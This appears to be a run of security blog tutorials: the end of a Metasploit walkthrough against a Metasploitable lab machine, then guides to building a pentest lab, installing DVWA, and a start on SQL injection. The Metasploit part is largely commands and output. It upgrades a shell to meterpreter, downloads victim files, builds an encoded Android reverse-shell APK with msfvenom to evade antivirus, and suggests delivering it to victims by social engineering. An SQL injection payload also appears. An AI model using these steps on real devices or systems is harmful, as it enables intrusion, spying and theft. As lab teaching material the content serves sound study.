There is also another option to upgrade your shell session to meterpreter using the sessions command:

msf6 post(multi/manage/shell_to_meterpreter) > sessions -u 2

[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.74.128:4433 
[*] Sending stage (984904 bytes) to 192.168.74.129
[*] Meterpreter session 3 opened (192.168.74.128:4433 -> 192.168.74.129:46599) at 2021-06-29 10:55:16 -0400

This is a much easier way. You can kill any sessions with the “sessions” command using the “-k” flag followed by the session ID. You can interact with any of the sessions using the “-i” flag with the sessions command. Let’s open session 3 that we just got –

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...
meterpreter >

As you can see, now we’re in meterpreter. There’s a lot a meterpreter console can do. You can type help to get a list of commands meterpreter supports. Let’s find out some of the functionalities that meterpreter can do.

Meterpreter functionalities

Meterpreter gives you loads of options for you to explore. You can get the commands by typing in “help” in meterpreter console. You can navigate the victim machine using the basic navigational commands of Linux. You can also download or upload some files into the victim system. There is a search option to search the victim machine with your desired keywords:

You can search for a file with the search command with -f flag:

meterpreter > search -f license.txt
Found 8 results...
    /var/www/tikiwiki-old/license.txt (24381 bytes)
    /var/www/twiki/license.txt (19440 bytes)
    /var/www/tikiwiki/license.txt (24381 bytes)
    /home/msfadmin/vulnerable/twiki20030201/twiki-source/license.txt (19440 bytes)
    /var/www/tikiwiki-old/lib/adodb/license.txt (26079 bytes)
    /var/www/tikiwiki-old/lib/htmlarea/license.txt (1545 bytes)
    /var/www/tikiwiki/lib/adodb/license.txt (26079 bytes)
    /var/www/tikiwiki/lib/htmlarea/license.txt (1545 bytes)

Downloding any file is super straightforward as well:

meterpreter > download /var/www/tikiwiki-old/license.txt
[*] Downloading: /var/www/tikiwiki-old/license.txt -> /root/license.txt
[*] Downloaded 23.81 KiB of 23.81 KiB (100.0%): /var/www/tikiwiki-old/license.txt -> /root/license.txt
[*] download   : /var/www/tikiwiki-old/license.txt -> /root/license.txt

You can enter the shell of the system anytime you like with the shell command:

meterpreter > shell
Process 5502 created.
Channel 2 created.
whoami

root
^C
Terminate channel 2? [y/N]  y

Furthermore, there are some networking commands such as – arp, ifconfig, netstat, etc.

You can list the process running in the victim machine with the ps command. There is an option to see the PID of the process that has hosted the meterpreter:

meterpreter > getpid
Current pid: 5390

In Windows systems, you may be able to migrate your meterpreter onto another process using the migrate command. You could also get keystrokes by using the keyscan_start and keyscan_dump depending on the system. On our victim machine, these commands are not supported:

meterpreter > keyscan_start
[-] The "keyscan_start" command is not supported by this Meterpreter type (x86/linux)

You can always find out the capabilities from the help command. Always keep in mind, as long as you have the command execution abilities, you can just upload a script to the victim machine that will do the job for you.

Staying persistently on the exploited machine

As we told you earlier, if the victim system reboots, you will lose your active sessions. You might need to exploit the system once again or start the whole procedure from the very beginning – which might not be possible. If your victim machine runs Windows, there is an option called persistence in Metasploit, which will keep your access persistent. To do it you’ll have to use:

meterpreter > run persistence

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[-] x86/linux version of Meterpreter is not supported with this Script!

As you can see, this command does not work in our victim system. This is because it’s running on Linux. There is, however, an alternate option for keeping your access persistent on Linux machines as well.

For that purpose, you can use the crontab to do this. Cron is the task scheduler for Linux. If you’re not familiar with cron command in Linux, we suggest you follow an article that covers this topic in detail here.

Create custom payloads with msfvenom

msfvenom is a tool that comes with the Metasploit Framework.

With this tool, you can create custom payloads tailored to specific targets and requirements. Furthermore, you can attach payloads with other files that make your payload less suspicious. You can also edit the codes of your payloads and change them to evade detection by the threat detection systems. You can see all the options available for msfvenom by typing in msfvenom -h.

Check all options for creating your payload

To see all the options for creating the payload, you can list the modules by using the -l flag followed by the module type – which will be payload in our case.

msfvenom -l payloads

You’ll get a long list of payloads in the output. You can use grep command to narrow the result down to your liking. Let’s say I wanted to create payloads for Android. I’ll use the following to list the payloads:

msfvenom -l payloads | grep android

    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    android/shell/reverse_http                          Spawn a piped command shell (sh). Tunnel communication over HTTP
    android/shell/reverse_https                         Spawn a piped command shell (sh). Tunnel communication over HTTPS
    android/shell/reverse_tcp                           Spawn a piped command shell (sh). Connect back stager

Now, imagine I wanted to use the marked payload (android/meterpreter/reverse_tcp). I will need to know what options I have to set. To see the options for the payload, you’ll have to use the -p flag to specify the payload and the --list-options flag as below:

msfvenom -p android/meterpreter/reverse_tcp --list-options

Options for payload/android/meterpreter/reverse_tcp:
=========================


       Name: Android Meterpreter, Android Reverse TCP Stager
     Module: payload/android/meterpreter/reverse_tcp
   Platform: Android
       Arch: dalvik
Needs Admin: No
 Total size: 10175
       Rank: Normal

Provided by:
    mihi
    egypt <egypt@metasploit.com>
    OJ Reeves

Basic options:
Name   Current Setting  Required  Description
‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Description:
  Run a meterpreter server in Android. Connect back stager



Advanced options for payload/android/meterpreter/reverse_tcp:
=========================

    Name                         Current Setting  Required  Description
    ----                         ---------------  --------  -----------
    AndroidHideAppIcon           false            no        Hide the application icon automatically after launch
    AndroidMeterpreterDebug      false            no        Run the payload in debug mode, with logging enabled
    AndroidWakelock              true             no        Acquire a wakelock before starting the payload
    AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
    AutoRunScript                                 no        A script to run automatically on session creation.
    AutoSystemInfo               true             yes       Automatically capture system information on initialization.
    AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
    AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
    EnableStageEncoding          false            no        Encode the second stage payload
    EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
    HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
    InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
    PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
    PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
    PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
    PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
    PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
    PingbackRetries              0                yes       How many additional successful pingbacks
    PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
    ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
    ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
    ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
    ReverseListenerComm                           no        The specific communication channel to use for this listener
    ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
    SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
    SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
    SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
    SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
    StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
    StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
    StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
    StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
    StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
    VERBOSE                      false            no        Enable detailed status messages
    WORKSPACE                                     no        Specify the workspace for this module

Evasion options for payload/android/meterpreter/reverse_tcp:
=========================

    Name  Current Setting  Required  Description
    ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐

There are loads of options for this exploit, as you can see. The options are divided into two categories. Basic options and Advanced options. You can create a payload just by setting up the basic options. However, advanced options are very important as well. They offer customization as well as play a crucial role to evade threat detection systems.

You can modify them and check how many anti-viruses detect it as a threat. Many online websites allow you to check your payloads. Keep in mind, however, that these systems might store your data and add them to the anti-virus database, rendering your payloads to be detected more often.

VirusTotal is a website that allows you to upload a file and check for viruses. There are online virus checkers for almost all the anti-virus packages (avast, avg, eset, etc.). At the end of this article, you’ll see me testing our payload on these websites.

Encoding your payload to evade detection

Before we create the payload, remember encoders? Encoders are the modules that encrypt the code so it becomes harder for the threat detection systems to detect it as a threat. Let’s see how to encode our payload. At first, list the encoder options available. I’ll use the ruby based encoders by grepping ruby:

msfvenom -l encoders | grep ruby
    ruby/base64                   great      Ruby Base64 Encoder

Let’s set up the basic options and create a basic payload now:

msfvenom -p android/meterpreter/reverse_tcp -e ruby/base64 LHOST=192.168.74.128 LPORT=8080 -o /root/Desktop/payload.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of ruby/base64
ruby/base64 succeeded with size 13625 (iteration=0)
ruby/base64 chosen with final size 13625
Payload size: 13625 bytes
Saved as: /root/Desktop/payload.apk

Here, the LHOST is our IP address and LPORT is the port for the connection. You should change the default port to evade easy detection. Now, before we send this payload, we need to set up the handler for the incoming connection. Handler is just a program that will listen on a port for incoming connections, since the victim will connect to us. To do that, we’ll fire up msfconsole and search multi/handler:

search multi/handler

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ‐‐‐‐                                                 ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐       ‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   0  exploit/linux/local/apt_package_manager_persistence  1999-03-09       excellent  No     APT Package Manager Persistence
   1  exploit/android/local/janus                          2017-07-31       manual     Yes    Android Janus APK Signature bypass
   2  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3  exploit/linux/local/bash_profile_persistence         1989-06-08       normal     No     Bash Profile Persistence
   4  exploit/linux/local/desktop_privilege_escalation     2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   5  exploit/multi/handler                                                 manual     No     Generic Payload Handler
   6  exploit/windows/mssql/mssql_linkcrawler              2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   7  exploit/windows/browser/persits_xupload_traversal    2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   8  exploit/linux/local/yum_package_manager_persistence  2003-12-17       excellent  No     Yum Package Manager Persistence


Interact with a module by name or index. For example info 8, use 8 or use exploit/linux/local/yum_package_manager_persistence

As you can see, number 5 is our manual and Generic Payload Handler. Use this one and we must set our payload matching to the one we just used (/android/meterpreter/reverse_tcp) –

use 5

[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload /android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ‐‐‐‐   ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐  ‐‐‐‐‐‐‐‐‐‐‐
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   ‐‐  ‐‐‐‐
   0   Wildcard Target

In the output, we can see that the default payload for exploit (multi/handler) was (generic/shell_reverse_tcp). So we set the payload to our desired one (android/meterpreter/reverse_tcp). Now let’s set up the LHOST to 192.168.74.128 (attack machine’s IP) and LPORT to 8080 just like we did when we created the payload:

msf6 exploit(multi/handler) > set LHOST 192.168.74.128
LHOST => 192.168.74.128
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080

Now you can run this exploit to start listening in for connections –

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.74.128:8080

The meterpreter session will start as soon as the Android device installs the apk file. This concludes how you can create payloads with the msfvenom tool. You can send this apk out and ask the victims to install it by social engineering or go install it yourself if you have physical access. Bear in mind that violation of privacy and system penetration without permission is illegal and we suggest you use these techniques ethically for learning purposes only.

Checking if your payload can evade anti-virus programs

We’ve already told you how you might try to evade the anti-virus software. Let’s have some fun now. We’ll check how many viruses can detect our apk payload that we just created.

The result is phenomenal. Or, there might be something wrong here! The VirusTotal website might not properly work for the APK files. Whatever it may be, you now know how to create custom payloads for penetration testing.

Conclusion

In this tutorial, you learned about Metasploit Framework from the basics to the advanced level. You can experiment and practice to learn more on your own.

We showed you how to use Metasploit on an intentionally vulnerable machine Metasploitable 2. In reality, these types of backdated and vulnerable machines might not be present nowadays. However, there are so many vectors from where an attack might be possible. Keep on learning.

Remember to use your knowledge for the good. We hope you liked our tutorial. If you have something you’d like to ask, feel free to leave a comment. We’ll get back to you as soon as possible.

This post will give you a step-by-step guide on setting up your virtual penetration testing lab and install the various operating systems and vulnerable machines you can start with.

Why Setup A Virtual Penetration Testing Lab

The most apparent reason you would need a penetration testing lab is to practice what you learn and test the different available security tools.

However, other than convenience, there are more reasons as to why you need a virtual lab.

1. Your safety

One is for your safety. Performing a penetration test on a system without permission from the owner is illegal and regarded as a computer crime. That can land you into trouble with the owner or even the authorities if issues escalate beyond control.

To avoid such problems and be on the safe side, you can host the various vulnerable machines available in your penetration testing lab and exploit them.

2. It’s isolated from the real-world environment

This is another reason why a penetration testing lab is necessary. Anything you perform in the lab does not affect the systems or people around you.

For example, if you are trying to get into malware analysis, you will deal with real viruses (the WannaCry ransomware). There is a high risk of this malware spreading through the computer network or even storage drives shared among people in a real-world scenario.

This virus will be isolated with a virtual testing lab and can only impact the installed virtual machine, whichs is much more manageable.

3. It’s a reliable testing platform

Finally, a virtual penetration testing lab is flexible and will provide you with a reliable platform for research and development.

You can develop new security tools, advanced exploitation tactics in a controlled environment without affecting any systems or networks around you.

Understanding Virtualization Technology

When setting up a penetration testing lab, you will have two options to choose from:

1. Use locally-hosted virtualization technology (Recommended)
2. Set up a home lab with additional computer devices and components available.

The latter (home lab) can be a little expensive and complicated to set up and manage. You will need to gather all computer devices and routers and use them to set up a lab. For example, you can have Computer A running your hacking distribution (say Kali Linux) and Computer B or C running your vulnerable machines (say DVWA or BWAPP). You will also need routers, switches, ethernet cables to manage the personal network.

Locally-hosted virtualization is much easier to set up, manage and only requires you to have one powerful PC that supports virtualization technology. That is the method that we will use in this post. Essentially, virtualization allows you to run more than one operating system on your computer. You will need to install virtualization software and use it to run the additional operating systems to get started. Some of the most common softwares are VirtualBox and VMware.

VirtualBox is a free and open-source virtualization software developed by Oracle distributed under the GNU General Public License (GPL) version 2.

VMware, on the other hand, is a commercial software company and has several products to offer. The only free version is the VMware Workstation Player intended for home or personal use. To get many more advanced features, including snapshots, you will need to upgrade to VMware Workstation pro.

Up to this point, I believe you have a good understanding of a penetration testing lab and the technology you need to come up with one.

Let’s dive in and set up our lab. Our virtualization software of choice for this post is VirtualBox.

Step 1. Download and Install VirtualBox on your PC

To get started, you will need to install VirtualBox on your current operating system. That can be Windows, Linux, or macOS. Additionally, install the VirtualBox guest Addition, which consists of drivers and system applications that improve the performance of your virtual machines. Other advantages of guest additions include:

• Mouse pointer integration
• Shared folders
• Improved video support
• Generic host/guest communication channels
• Seamless window management
• Shared clipboard
• Time synchronization
• Automated logins

After a successful install, proceed to launch the virtual box from the application menu.

Step 2. Install Kali Linux on VirtualBox

Once you have VirtualBox installed and running, we can start installing our virtual machines. We will begin by installing the penetration testing distribution of our choice.

In this post, we will use Kali Linux. However, that should not limit you from using other security operating systems like BlackArch Linux, Parrot, etc.

To install Kali Linux virtual machine, we will not need to download the setup ISO file and configure everything from scratch. Nowadays, Kali Linux comes packaged in several formats.

• Bare Metal setup – used to install Kali Linux on your PC in a single boot or multi-boot setup.
• Virtual machines: This option provides you with pre-configured virtual machine images to install on your virtualization software. As of writing this post, the only supported virtualization platforms are VMware and VirtualBox.
• ARM setup: Used for ARM devices such as the Raspberry Pi.
• Cloud setup
• Container setup (Docker)
• Live Boot setup
• WSL (Windows Subsystem for Linux)

In this post, we will download the Kali Linux virtual machine setup for VirtualBox from the official Kali Linux download page. It is a `.ova` file.

After the download is complete, launch VirtualBox from your applications menu and follow the steps below:

1. Click on the File menu and select Import Appliance. Alternatively, you can use the keyboard shortcut (Ctrl + I).
2. A new window will open. Click on the file icon, select the `Kali Linux.ova` file you downloaded, and click Next.
3. In the next window, you will see all the information about the virtual machine. Select the import option at the bottom to import the virtual machine.

After a successful import, you will see Kali Linux listed on your VirtualBox window, as shown in the image below.

You can tweak the settings of the virtual machine depending on your system resources. When done, click Start to boot the virtual machine. You don’t need to perform any configurations, just sit and wait till you get to the Kali Linux login screen.

The default credentials are:

• Username: Kali
• Password: Kali

Step 3. Install Windows 10 on VirtualBox

Microsoft’s Windows is the most popular operating system used worldwide. As an ethical hacker, you need to understand how to exploit and find vulnerabilities on Windows systems and software. For that case, we will also need to install Windows as a virtual machine – specifically Windows 10. You can download Windows 10 ISO file from Microsoft Official website.

Launch VirtualBox and follow the steps below to install Windows 10

1. Click New on the VirtualBox window
2. A small window will open. Enter the name of your new operating system (for example, Windows 10). Click Next.
3. Enter the memory size you wish to assign your new virtual machine and click Next.
4. In the next window, select Create a virtual hard disk now and click Next.
5. Select `VDI` (VirtualBox Disk Image)
6. Select whether you want to use the Dynamically allocated or Fixed Size hard disk on the next screen. Click Next.
7. Set the storage size of your Windows 10 virtual machine. Click Create.

That will create a Windows 10 virtual machine, as shown in the image below.

To install Windows 10 as a virtual machine, click the Start button on the VirtualBox window. A window will pop up and prompt you to select the Windows 10 ISO file you downloaded.

Click Start when done. After a few seconds, you will get to the Windows 10 installation screen.

Continue with the installation process like you were installing Windows natively on your PC.

When done, you can proceed to install Metasploitable.

Step 4. Install Metasploitable

Metasploitable is an intentionally vulnerable Linux-based system used to practice penetration testing.

Like the Kali Linux virtual machine, Metasploitable comes in a pre-configured virtual machine, making the whole installation easier.

Head over to SourceForge and download the Metasploitable VM.

After a successful download, launch VirtualBox and follow the steps below:

1. Click New on the VirtualBox window
2. Set a name for your virtualization machine (for example, `Metasploitable-2`). Click Next.
3. Set the memory (RAM) size. Metasploitable can run efficiently on 512 MB of RAM. Click Next.
4. On the next window, select “Use an existing virtual hard disk file.”
5. Click the file icon and select the Metasploitable VMDK file.
6. Click Create

You should now see Metasploitale virtual machine on your VirtualBox window as shown in the image below:

Click Start to launch Metasploitable.

This vulnerable machine doesn’t come with a Graphical User Interface (GUI). Therefore, when it’s fully booted, all you will see is a console. Use the following default credentials to log in:

• Username: msfadmin
• Password: msfadmin

Final Thoughts

This post has given you a step-by-step guide to setting up a virtual penetration testing guide. You can now use Kali Linux to exploit your target machines (Windows or Metapsploitable). However, that shouldn’t be the end. You can install more vulnerable machines like the Buggy Web Application (bWAPP), Bee Box, OWASP Broken Web Apps, and much more.

Additionally, depending on the field you want to specialize in, you can consider adding more advanced penetration testing systems. For example, if you’re going to specialize in web application security, try using the Samurai Web Testing Framework. Did you come across any issues, or do you have any additional information for our readers? Please, feel free to let us know in the comments and we’ll get back to you as soon as we can.

Performing penetration tests on systems without administrative permission is considered illegal and can land you in huge problems, including a jail term with hefty fines.

Practice makes perfect, but then, where do you practice hacking skills?

There are so many platforms available that you can use to practice penetration testing. Some of these are online platforms like TryHackMe, HackTheBox, etc.

Some like Vulnhub allow you to download vulnerable virtual machines that you can exploit. This post will look at one of the platforms that you can install and set up on your Kali Linux system – The Damn Vulnerable Web Application (DVWA).

DVWA is a vulnerable web application developed with PHP and MYSQL.

Yes! It’s intentionally developed to be vulnerable.

From my experience, it’s a great platform for both beginners and skilled since you have an option to set the desired security level (low, medium, high or impossible).

It’s also a great resource for web developers who wish to develop web applications with security in mind.

To learn a bit on how you can practice on it, you can check our related tutorial on explaining SQL injections using DVWA

Let’s dive in and get started right away.

Note: This tutorial should work on other Debian-based distros, as well.

Step 1. Download DVWA

Since we will be setting up DVWA on our localhost, launch the Terminal and navigate to the /var/www/html directory. That’s the location where localhost files are stored.

cd /var/www/html

Next, we will clone the DVWA GitHub repository in the /html directory using the command below.

sudo git clone https://github.com/ethicalhack3r/DVWA

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for kali: 
Cloning into 'DVWA'...
remote: Enumerating objects: 3398, done.
remote: Counting objects: 100% (85/85), done.
remote: Compressing objects: 100% (54/54), done.
remote: Total 3398 (delta 38), reused 58 (delta 29), pack-reused 3313
Receiving objects: 100% (3398/3398), 1.65 MiB | 4.21 MiB/s, done.
Resolving deltas: 100% (1508/1508), done.

Step 2. Configure DVWA

After successfully cloning the repository, run the ls command to confirm DVWA was successfully cloned.

ls

DVWA  index.html  index.nginx-debian.html

From the image above, you can see the DVWA folder. Now we need to assign Read, Write and Execute permissions (777) to this folder. Execute the command below.

sudo chmod -R 777 DVWA

To set up and configure DVWA, we will need to navigate to the /dvwa/config directory. Use the command below:

cd DVWA/config

Run the ls command to see the contents of the config directory.

ls

config.inc.php.dist

You should see a file with the name config.inc.php.dist. That file contains the default DVWA configurations.

We will not tamper with it, and it will act as our backup if things go south. Instead, we will create a copy of this file with the name config.inc.php that we will use to configure DVWA. Use the command below.

sudo cp config.inc.php.dist config.inc.php

You can use the ls command to check if the file was copied successfully.

ls

config.inc.php  config.inc.php.dist

Now, open the config.inc.php file with the nano editor to make the necessary configurations.

sudo nano config.inc.php

Scroll down to the point where you will see parameters like db_database, db_user, db_password, etc., as shown in the image below. Feel free to change these values, but note them down since you will require them when setting up the database. In my case, I will set db_user to userDVWA and db_password to dvwa.

...
$_DVWA = array();
$_DVWA[ 'db_server' ]   = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ]     = 'userDVWA';
$_DVWA[ 'db_password' ] = 'dvwa';
$_DVWA[ 'db_port'] = '3306';
...

Save your changes (Ctrl + S) and Exit (Ctrl +X).

Step 3. Configure Database

By default, Kali Linux comes installed with the MariaDB relational database management system. You, therefore, don’t need to install any packages. First, start the mysql service with the command below.

sudo systemctl start mysql

You can check whether the service is running with the command:

systemctl status mysql

● mariadb.service - MariaDB 10.5.9 database server
     Loaded: loaded (/lib/systemd/system/mariadb.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 19:13:38 EDT; 8s ago
       Docs: man:mariadbd(8)
             https://mariadb.com/kb/en/library/systemd/
    Process: 1632 ExecStartPre=/usr/bin/install -m 755 -o mysql -g root -d />
    Process: 1634 ExecStartPre=/bin/sh -c systemctl unset-environment _WSREP>
    Process: 1636 ExecStartPre=/bin/sh -c [ ! -e /usr/bin/galera_recovery ] >
    Process: 1699 ExecStartPost=/bin/sh -c systemctl unset-environment _WSRE>
    Process: 1701 ExecStartPost=/etc/mysql/debian-start (code=exited, status>
   Main PID: 1684 (mariadbd)
     Status: "Taking your SQL requests now..."
      Tasks: 15 (limit: 2287)
     Memory: 109.0M
        CPU: 1.339s
     CGroup: /system.slice/mariadb.service
             └─1684 /usr/sbin/mariadbd

To log in to the database, use the command below. In our case, we are using root since that is the superuser name set on our system. If you have something different, then you will need to replace the root.

sudo mysql -u root -p

You will be prompted for a password. However, since we haven’t set any yet, just hit Enter to continue.

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.5.9-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

We will first create a new user using the credentials we set in the config.inc.php file in the DVWA directory. Execute the command below, replacing the username and password with your preset credentials.

create user 'userDVWA'@'127.0.0.1' identified by "dvwa";

Query OK, 0 rows affected (0.010 sec)

We now need to grant this user total privilege over the dvwa database. Execute the command below, replacing the username and password with your credentials.

grant all privileges on dvwa.* to 'userDVWA'@'127.0.0.1' identified by 'dvwa';

Query OK, 0 rows affected (0.001 sec)

That’s it! We are done configuring the database. Type Exit to close it.

Step 4. Configure Apache Server

The Apache web server comes installed by default on Kali Linux. Therefore, we don’t have to need to install any additional packages.

To get started configuring Apache2, launch the Terminal and navigate the /etc/php/7.4/apache2 directory.

Note: As of writing this post, the PHP version available for Kali Linux is 7.4. If there is an update, running the command might raise the no such file or directory error. Therefore, you might first want to check your PHP version (ls /etc/php) and replace it accordingly in the command above.

cd /etc/php/7.4/apache2

When you execute the ls command, you will see a file called php.ini. Execute the command below to edit this file using the nano editor.

sudo nano php.ini

Scroll and look for the allow_url_fopen and allow_url_include lines and ensure that both are set to On.

By default, both or one of them is always set to Off.

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as >
; http://php.net/allow-url-include
allow_url_include = On

Save your changes (Ctrl +S) and Exit (Ctrl + X).

Proceed to start the apache webserver service with the command below. You can check whether the service is running by running the status command.

sudo systemctl start apache2
systemctl status apache2

● apache2.service - The Apache HTTP Server                                   
     Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor p>
     Active: active (running) since Mon 2021-07-26 20:25:48 EDT; 5s ago
       Docs: https://httpd.apache.org/docs/2.4/
    Process: 2245 ExecStart=/usr/sbin/apachectl start (code=exited, status=0>
   Main PID: 2256 (apache2)
      Tasks: 6 (limit: 2287)
     Memory: 17.8M
        CPU: 82ms
     CGroup: /system.slice/apache2.service
             ├─2256 /usr/sbin/apache2 -k start
             ├─2258 /usr/sbin/apache2 -k start
             ├─2259 /usr/sbin/apache2 -k start
             ├─2260 /usr/sbin/apache2 -k start
             ├─2261 /usr/sbin/apache2 -k start
             └─2262 /usr/sbin/apache2 -k start

Step 5. Open DVWA on Your Web Browser

Up to this point, we have configured DVWA, Database, and the Apache webserver.

We can now proceed to start the DVWA application. Launch your Web browser and type the URL below.

127.0.0/DVWA

This action will redirect us to the DVWA setup.php page at http://127.0.0.1/DVWA/setup.php.

When you scroll down, you will see some errors in red color. Don’t panic! Click the Create / Reset Database button at the end of the page.

That will create and configure the DVWA database. After a few seconds, you will be redirected to the DVWA login page.

Use the default credentials below to log in.

• Username: admin
• Password: password

After successfully logging in, you will be greeted by the DVWA homepage. On the left side, you can see all the available vulnerable pages you can use to practice.

You will also see the DVWA Security option that enables you to choose the security level depending on your skills.

That’s it! Now, you can start testing out your web penetration skills on the DVWA.

Conclusion

DVWA is a great platform for both beginners and advanced users because of its multi-layered security support. I believe this post has given you a detailed guide on how to set up DVWA on your Kali Linux system.

If you faced issues or errors in any of the steps above, please feel free to let us know in the comments section or by contacting us.

There are several applications that you can use to learn SQL injection.

In this particular post, we will use the Damn Vulnerable Web Application (DVWA). It’s a web app developed in PHP and MySQL and intentionally made to be vulnerable.

If you don’t have DVWA installed yet, feel free to check out our post on How to set up DVWA on Kali Linux.

What is SQL Injection (SQLI)?

SQL injection, commonly referred to as SQLI, is an attack where an application allows unauthorized users to send SQL queries to the database and gain access to information they shouldn’t.

In most cases, hackers use SQL injection to retrieve user/company data, modify database contents or delete the entire database, thus bringing down the whole web system.

In fatal cases, attackers can escalate the SQL injection attack thus, gaining access to the entire underlying back-end infrastructure, server or even perform a Denial of Service attack (DoS).

As of 2021, OWASP Top 10 is a standard awareness framework for developers, and web application security listed Injection (SQL, NoSQL, OS, and LDAP) as the number one vulnerability.

The Impact of a Successful SQL Injection Attack

SQL injection is one of the popular attacks behind the data leaks that we see on the internet and the Dark Web. That includes information like user emails, usernames, passwords, and even credit card information. This attack leads to reputational damage and loss of revenue in regulatory fines. In other cases, attackers can escalate the SQL injection attack and create a persistent backdoor. That allows them to compromise the system for a long time and remain unnoticed.

How an SQL Injection Attack Works

Think of a website with a simple login form with two fields – a username, password, and a Login or Submit button. After you enter the required credentials, when you hit the Submit button, the query sent to the database has this syntax:

SELECT username, password FROM usersdb WHERE username=$user;

E.g., If your name is JohnDoe,

SELECT username, password FROM usersdb WHERE username='Johndoe';

Anyone with a hacker’s mindset can decide to manipulate the application by entering a value different from the username. This value will be an SQL query to reveal or modify the database’s contents. For example, if the attacker entered abc’ OR 1=1–‘ instead of the actual username, the resulting SQL query would look like this:

SELECT username, password FROM usersdb WHERE username='abc' OR 1=1--';

Let’s dissect this input abc' OR 1=1--' and see how it manipulates the database.

• abc': Here we just guessed any username but we added a single quote ‘ at the end. The single quote closes our username field, and the following part becomes an SQL query.
• OR is a conjunction in SQL, and 1=1 will always be true. Therefore, no matter what you put in the username field, the query will always be True and return all the records of the userdb database.
• The --'(double dash) is a comment in SQL. It tells the SQL server not to execute any query past this point. In this particular example, we are using double dash to comment out errors that would arise because of the trailing single quote at the end. You can also use # instead of --. E.g abc' 1=1#

I believe up to this point; you have a good understanding of what SQL injection is. Let’s dive in and exploit actual SQL injection queries on our DVWA.

Setup DVWA for SQL Injection

